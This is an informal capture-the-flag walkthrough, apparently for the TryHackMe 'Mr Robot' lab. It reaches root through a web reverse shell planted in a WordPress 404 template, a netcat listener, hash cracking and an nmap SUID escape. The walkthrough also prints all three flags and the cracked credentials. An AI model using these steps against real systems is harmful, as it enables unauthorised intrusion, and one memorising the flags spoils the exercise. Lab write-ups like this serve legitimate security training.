first access their machine using openvpn
then start the machine which is terminate withen 1 hour you have ip there scan this ip using namap -A -T4 -p- (ip) -o nmap.txt
after scan this ip seach this ip in firefox using port 80 (10.10.101.131:80) like that then you are seeing fsociety website 
then you have to search in firefox (http://10.10.101.131/robots.txt) like that 
ten you see User-agent: *
fsocity.dic
key-1-of-3.txt
 like that file key 1 is there mr robot 1st key:(073403c8a58a1f80d943455fb30724b9)
then you have to search ip (http://10.10.101.131/license) like that scroll down you have a key preserve it pass should be ZWxsaW90OkVSMjgtMDY1Mgo=  like that.
then you have to search (http://10.10.101.131/wp-login) like that you see word press login site
then go to your terminal search this command decode password (echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 -d) then you have wordpress login pass (elliot:ER28-0652) then log in
then go to apperences from side manu bar then select editor then select 404 then clear the dialogue box
then go to firefox and search (https://pentestmonkey.net/tools/web-shells/php-reverse-shell) then download (php-reverse-shell-1.0.tar.gz) after download extrect it open shell copy all command and paste it in 404 dialogue box change ip address using your tryhackme access ip and change port 4444
then go to your terminal and type nc -lvnp 4444 then go to wordpress page and change search content (http://10.10.101.131/wp-content/themes/twentyfifteen/404.php) with this then reload
go to your terminal seee you have ip then type (python3 -c 'import pty;pty.spawn("/bin/bash")' then enter 
you see linux terminal type ls then cd home then cd robot then see key 2 then type cat password.raw-md5 you have a hase (c3fcd3d76192e4007dfb496cca67e13b) like thet then go to search crackstation paste it crack the hash then you have (abcdefghijklmnopqrstuvwxyz) this password.
then go t0 terminal type su robot press enter then paste hash password then type cat key-2-of-3.txt then you have 2nd key(822c73956184f694993bede3eb39f959).
then find 3rd key you have to type in terminal (find / -perm /4000 -type f 2> /dev/null) then press enter
then type nmap -v then type nmap --interactive for access nmap.
now type !sh then type whoami then ls then you have 3rd key(04787ddef27c3dee1ee161b21670b4e4) mr robot close thank you from---2023
